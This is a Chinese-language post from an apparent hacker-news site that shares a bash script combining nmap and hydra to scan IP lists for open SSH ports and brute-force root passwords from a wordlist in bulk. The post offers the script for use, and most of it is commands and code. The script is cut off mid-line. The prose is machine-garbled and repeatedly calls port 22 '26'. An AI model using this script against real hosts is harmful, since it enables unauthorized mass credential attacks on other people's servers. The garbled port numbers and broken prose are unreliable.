一记组合拳,批量SSH弱密码爆破检测工具分享
手机扫一扫
黑客病毒漏洞黑防入侵DDOS病毒硬件
黑资讯>黑客软件>一记组合拳,批量SSH弱密码爆破检测工具分享

一记组合拳,批量SSH弱密码爆破检测工具分享

黑客软件hacker2019-06-11 23:03:5914635A+A-

"序言

SSH账户密码的破解工具早已有很多,但有时候還是存有不可以考虑每日任务要求的状况。例如,大批量地对iP目录里的ip地址开展SSH登陆破译,目前的专用工具立即应用起來总感觉不便捷。那么,可否运用目前的专用工具,来订制打造出合适自个的武器装备?或许能够,并且,它是愿意粗心的小宝宝们必须把握的这项专业技能。

文章正文

一记组合拳,批量SSH弱密码爆破检测工具分享 第1张

大批量工程爆破SSH账户密码的步骤不需要理由。最先检测另一方服务器是不是打开26端口号,如打开,则试着开展SSH登陆密码工程爆破。这儿采用几款强劲的开源系统专用工具。1个是nmap,用于检测26端口号是不是打开;另外是hydra,用于工程爆破SSH账户密码。这几款专用工具我不会做过多的详细介绍,他们的强劲,谷歌一下下,自有感受。那么如何把这几款专用工具融合到一块儿应用,写作者这儿根据采用的是灵便的shell脚本制作。

        

如圖如图所示,全过程分成二步,最先用nmap大批量地扫描仪对外开放26端口号的公在网上的机器设备,运行命令给出:

nmap -vv -n –sS -sU -p22 -iL ./iplist.txt  | grep ""Discovered open port"" | awk {'print $6'} | awk -F/ {'print $1'} > ./26-output.txt   

那条指令的含意是,扫描仪iplist.txt文档中的ip地址是不是打开26端口号;如打开,则将这一結果輸出到26-output.txt文档中。那条指令可以那样写:

nmap -vv -n –sS -sU -p22 192.168.1.0/28  | grep ""Discovered open port"" | awk {'print $6'} | awk -F/ {'print $1'} > ./26-output.txt 

它是对1个网段的扫描仪,还可以换为1个iP。-sS和-sU全是扫描仪对策的选择项,2个一块儿应用,能够提升扫描仪的可信性。在实际上检测全过程中(内部网自然环境),nmap還是存有漏扫的状况,愿意提升它的命中率,还需自个连续不断试着,连续不断调节扫描仪对策才会有觉得。

第四步为,载入26-output.txt文档中对外开放26端口号的服务器,应用hydra专用工具开展登陆密码工程爆破,应用的指令给出:

hydra -l root -P ./password.txt -t 6 -vV 192.168.0.12 ssh | grep ""host:""

那条指令的含意是选用密码本./password.txt中的登陆密码,对ip地址为:192.168.0.12的服务器开展密码破解。grep “host:”用于过虑复印的輸出,只輸出破译到登陆密码的内容。因为hydra多次只有对1个iP开展破译,因而,在shell中写了1个循环系统,hydra多次每日任务完毕后,马上开展下个iP的破译,直至将26-output.txt文档中iP遍历完已经。编码给出如图所示。

cat ./26-output.txt | while read line Do echo ""Current Task: ${line}"" hydra -l root -P $passfile -t 6 -vV $line ssh | grep ""host:""  done

遍历编码非常简单,无需诧异,这就是说shell脚本制作的奇妙独到之处。关键流程说完后,下边讨论一下全部编码,看怎样用shell程序流程将这种串起來。

#!/bin/bash  if [ $# -lt 4 ] then echo ""usage: ./hydra.sh -p ./password.txt -f ./iplist.txt"" echo ""usage: ./hydra.sh -p ./password.txt -l 192.168.9.0/28"" exit 1 fi while [ -n ""$1"" ] Do case ""$1"" In -p)  

        passfile=$2 #echo $passfile  shift ;; -f)  

        nmap -vv -n -sS -sU -p22 -iL $2 | grep ""Discovered open port"" | awk {'print $6'} | awk -F/ {'print $1'} > ./26-output.txt shift ;; -l)  

        nmap -vv -n -sS -sU -p22 $2 | grep ""Discovered open port"" | awk {'print $6'} | awk -F/ {'print $1'} > ./26-output.txt shift ;; 

    *) echo ""$1 Is not an opt


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
漏洞黑客黑客技术黑客网站黑客博客黑客论坛黑客入门免费黑客网黑客教程渗透测试渗透培训代码审计白帽黑客黑客软件黑客工具

相关文章

  • 5条评论
  • 萌懂橪书2022-06-01 08:13:15
  • 示。cat ./26-output.txt | while read line Do echo ""Current Task: ${line}&q
  • 舔夺瘾然2022-06-01 03:47:03
  • 直至将26-output.txt文档中iP遍历完已经。编码给出如图所示。cat ./26-output.txt | while read line Do echo
  • 嘻友枝桠2022-06-01 02:40:15
  • int $6'} | awk -F/ {'print $1'} > ./26-output.txt   那条指令的含意是,扫描仪iplist.txt文档中的ip地址是不是打开26端口号;如打开,则将这一結果輸出到26-output.txt
  • 森槿妄愿2022-06-01 09:47:57
  • -f ./iplist.txt"" echo ""usage: ./hydra.sh -p ./password.txt -l 192.168.9.0/28"" exit 1 fi while [ -n ""$1&
  • 瑰颈眼戏2022-06-01 00:20:43
  • ne遍历编码非常简单,无需诧异,这就是说shell脚本制作的奇妙独到之处。关键流程说完后,下边讨论一下全部编码,看怎样用shell程序流程将这种串起來。#!/bin/bash  if [ $# -lt 4 ] then echo ""u
发表评论

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理